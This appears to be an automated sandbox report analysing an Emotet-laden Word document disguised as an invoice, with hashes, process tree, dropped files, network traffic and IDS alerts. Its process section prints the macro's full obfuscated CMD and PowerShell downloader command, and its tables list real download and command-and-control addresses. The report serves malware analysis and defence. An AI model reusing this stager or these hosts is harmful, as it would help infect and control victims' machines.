analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Invoice_MLC_D067919.doc

Full analysis: https://app.any.run/tasks/addbc16f-c736-4d35-af69-f0712370d2d4
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 12:47:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Emma-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 7 16:48:00 2018, Last Saved Time/Date: Wed Nov 7 16:48:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

E3FB064E9E2F56D0856075F948C7D063

SHA1:

04C032F2E1B3FF8D5A41A727D0929E89C7206D1A

SHA256:

F805C432900C456C379A8D328335F0A7D310B4A2B22F15AA983F3366C5BFA9D0

SSDEEP:

768:V7FLVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9Ok/kIDPjEed72c:VZLocn1kp59gxBK85fBt+a95dS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 1908)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1908)
    • Application was dropped or rewritten from another process

      • 509.exe (PID: 3624)
      • 509.exe (PID: 3136)
      • lpiograd.exe (PID: 2108)
      • lpiograd.exe (PID: 3876)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2556)
    • Emotet process was detected

      • lpiograd.exe (PID: 2108)
    • EMOTET was detected

      • lpiograd.exe (PID: 3876)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 3876)
    • Connects to CnC server

      • lpiograd.exe (PID: 3876)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 2416)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2556)
      • 509.exe (PID: 3136)
    • Creates files in the user directory

      • powershell.exe (PID: 2556)
    • Starts itself from another location

      • 509.exe (PID: 3136)
    • Application launched itself

      • lpiograd.exe (PID: 2108)
    • Connects to SMTP port

      • lpiograd.exe (PID: 3876)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1908)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1908)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:07 16:48:00
CreateDate: 2018:11:07 16:48:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Emma-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 509.exe no specs 509.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
1908"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice_MLC_D067919.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2416CMD cmD /c "Set vPn=(NeW-OBjeCT io.cOmPREsSIon.DEflaTeSTream( [sySTeM.iO.MEmoRystREaM] [sYSTeM.cOnvErt]::frOMbASE64sTRing( 'PZBBb8IwDIX/Sg+RAmIkO8DEiCohwZAKE5tY2TjskgaXZjRJlaaEDfHfl6Kxm/X8+dl+SKbbWIPvm+wLhItW4MgHZNNSgnYMbV/nMS6cq8aUeu8JV0EGW1lZA5E6N3Qtkwef/kwnf1TGC8mFBe7kkRNhFPWnQg2WgxtQS6743krRlK6xUFmzawRcSRXKEmo64i/vu+XoNiEKbsM9uTm1FMks9VORP6vVMGn+19aK1zXfAyka6rdPGzlQ6xSTt6qUroMnuMtQsplFcYSH94+YocXGxAj0cexAVT38iXttv4cJnACz3IQPRNFBs4WLpI7aILpnZ7/PKARGZsbr0vDdXJZwZe6i1rDLEn00B+gnwfSqsCz4HNhFcCeK8+XyCw=='),[sYStEM.io.cOMPRESSION.coMprESSionmoDE]::decompResS)^|%{NeW-OBjeCT Io.sTREamReADEr($_, [sySteM.tExt.ENcodINg]::aScIi) } ^| %{ $_.rEadTOENd( ) })^|inVOKe-EXpreSSioN&&POWerSHell ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL' ).Invoke( 'VPN',( \"{0}{1}{2}\"-f'pr','o','CESs' ) ) ))" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2556POWerSHell ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL' ).Invoke( 'VPN',( \"{0}{1}{2}\"-f'pr','o','CESs' ) ) ))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3624"C:\Users\admin\AppData\Local\Temp\509.exe" C:\Users\admin\AppData\Local\Temp\509.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
3136"C:\Users\admin\AppData\Local\Temp\509.exe"C:\Users\admin\AppData\Local\Temp\509.exe
509.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
2108"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
509.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
3876"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
Total events
1 678
Read events
1 263
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
1908WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR99EA.tmp.cvr
MD5:
SHA256:
2556powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9GI4WKLUMT8LCXZ9SCUA.temp
MD5:
SHA256:
2556powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da544.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
1908WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$voice_MLC_D067919.docpgc
MD5:59D80196D5D82A87BC7132B52619BD58
SHA256:311A499179B05586A508AEACF2EA19519AE82D56DD103B6E31868727D8709DA0
2556powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2556powershell.exeC:\Users\admin\AppData\Local\Temp\509.exeexecutable
MD5:6823E6E9A4321CFDA0767502921358E3
SHA256:63B0ECC943FCE32C509E12AF374918B7D0C9C65663F5B2E100FACC2FAEE1DC81
3136509.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:6823E6E9A4321CFDA0767502921358E3
SHA256:63B0ECC943FCE32C509E12AF374918B7D0C9C65663F5B2E100FACC2FAEE1DC81
1908WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:EAD40168CD6328019291DD00BEDCE23A
SHA256:1A1B47D1DD1AB828BF8A3064D7280E9274A454E99D50EB0E1F26FB497B639620
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
71
DNS requests
60
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2556
powershell.exe
GET
200
132.148.249.54:80
http://www.amenterprise.info/RiI6wTzC/
US
executable
792 Kb
malicious
2556
powershell.exe
GET
301
132.148.249.54:80
http://www.amenterprise.info/RiI6wTzC
US
html
246 b
malicious
3876
lpiograd.exe
GET
200
47.157.181.81:443
http://47.157.181.81:443/whoami.php
US
text
13 b
malicious
3876
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
751 Kb
malicious
3876
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
148 b
malicious
3876
lpiograd.exe
GET
200
47.157.181.81:443
http://47.157.181.81:443/
US
binary
52.3 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3876
lpiograd.exe
47.157.181.81:443
Frontier Communications of America, Inc.
US
malicious
2556
powershell.exe
132.148.249.54:80
www.amenterprise.info
GoDaddy.com, LLC
US
suspicious
3876
lpiograd.exe
187.163.174.149:8080
Axtel, S.A.B. de C.V.
MX
malicious
3876
lpiograd.exe
146.20.161.11:587
smtp.emailsrvr.com
Rackspace Ltd.
US
malicious
3876
lpiograd.exe
107.14.166.78:25
smtp.rreyes.net
Time Warner Cable Internet LLC
US
unknown
3876
lpiograd.exe
213.180.204.37:587
pop.yandex.com
YANDEX LLC
RU
unknown
3876
lpiograd.exe
85.233.160.21:25
mail.hosts.co.uk
Namesco Limited
GB
unknown
3876
lpiograd.exe
198.46.134.137:587
mail.disegnocasa.net
ColoCrossing
US
unknown
3876
lpiograd.exe
190.113.0.234:25
mail.tecnomak.cl
SERVICIOS INTERNET LTDA
CL
unknown
3876
lpiograd.exe
196.46.192.20:25
mail.zamnet.zm
ZAMNET-AS
ZM
unknown

DNS requests

Domain
IP
Reputation
www.amenterprise.info
  • 132.148.249.54
malicious
mail.pflamuko.com
  • 198.154.250.18
unknown
mail.outlook.com
unknown
smtp.wallacemfg.com
  • 205.178.146.235
malicious
mail.disegnocasa.net
  • 198.46.134.137
unknown
mail.rsn.com.mx
  • 67.23.251.149
unknown
pop.yandex.com
  • 213.180.204.37
  • 213.180.204.212
  • 87.250.251.37
  • 93.158.134.37
whitelisted
mail.twc.com
  • 107.14.73.68
shared
mail.arnet.com.ar
unknown
mail.hosts.co.uk
  • 85.233.160.21
  • 85.233.160.20
unknown

Threats

PID
Process
Class
Message
2556
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
2556
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2556
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2556
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3876
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3876
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3 ETPRO signatures available at the full report
No debug info